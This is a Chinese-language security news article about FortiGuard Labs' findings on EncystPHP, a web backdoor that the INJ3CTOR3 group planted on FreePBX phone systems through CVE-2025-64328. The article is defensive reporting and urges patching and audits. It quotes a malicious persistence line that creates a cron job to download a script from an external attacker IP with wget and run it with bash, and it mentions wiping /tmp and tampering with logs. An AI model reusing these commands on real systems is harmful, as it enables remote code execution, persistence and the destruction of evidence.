研究人员发现一款新型高级 Web 后门已潜入通信基础设施,该恶意程序利用高危漏洞将正常的电话系统改造为可长期控制的后门。飞塔安全防护实验室(FortiGuard Labs)将其命名为EncystPHP,这款恶意软件是针对 FreePBX 环境攻击行动的最新武器,而 FreePBX 是一款广泛应用的开源 IP 语音(VoIP)服务管理平台。
相关攻击行动始于 12 月初,攻击者利用一个身份验证后命令注入漏洞(CVE-2025-64328) 突破网络边界。成功入侵后,该恶意软件将被激活,其搭载多项高级功能,包括远程命令执行、持久化驻留机制及 Web 后门部署。
此次攻击行动被证实为某知名黑客组织的手笔,飞塔安全防护实验室已将该攻击行为溯源至黑客组织INJ3CTOR3—— 这一威胁行为者向来以攻击 VoIP 系统为主要目标。
该组织最早于 2020 年被发现利用 CVE-2019-19006 漏洞发起攻击,2022 年又将攻击目标转向 Elastix 系统,如今其攻击手段再次升级。报告指出:我们判定此次攻击行动,属于 INJ3CTOR3 组织近期的攻击活动及行为模式。
已监测到的攻击事件均遵循固定流程:先利用 FreePBX 漏洞实施攻击,再在目标环境中部署 PHP Web 后门。有记录显示,某起攻击的源地址为巴西,攻击目标是一家主营云服务与通信服务的印度科技公司所管理的业务环境。
EncystPHP 被设计为高度隐蔽的恶意程序,它通过模仿 FreePBX 的合法组件,试图规避安全工具的即时检测,从而在被入侵的服务器中隐秘驻留。
但其攻击能力却十分强悍,这款 Web 后门为攻击者提供了一套功能完善的受害主机控制工具,支持攻击者执行任意系统命令,相当于让攻击者掌握了整个 PBX 系统的控制权。
最令人警惕的是,该恶意软件高度重视持久化驻留能力。报告详细说明,EncystPHP 会利用 Linux 标准工具实现持久化驻留,确保自身能在系统重启或简单的安全清理操作后依然存活。
分析结果显示:该恶意软件会通过 wget 工具创建定时任务(cron jobs),从外部 IP 地址(45.234.176.202)下载并执行恶意脚本。同时,它还会实施痕迹清理操作,执行
rm -rf /tmp/*命令删除临时文件,并通过 sed 命令篡改系统日志。研究人员发现其持久化脚本为license.php,其中包含如下核心代码行:
system("echo '*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2' | crontab -");
此次事件为企业敲响警钟:通信系统仍是网络犯罪分子的高价值攻击目标。报告强调:该事件证明,攻击者可利用 CVE-2025-64328 漏洞部署隐蔽的持久化 Web 后门,这也凸显了未打补丁的 PBX 系统始终是黑客的重点攻击对象。
飞塔安全实验室敦促所有运行 FreePBX 系统的管理员立即安装漏洞补丁,并对系统进行全面审计,排查是否存在 EncystPHP 后门痕迹及未授权的定时任务。研究人员指出,尽管此次攻击所使用的技术并非全新手段,但相关威胁仍处于活跃且持续扩散的状态。
发表评论
您还未登录,请先登录。
登录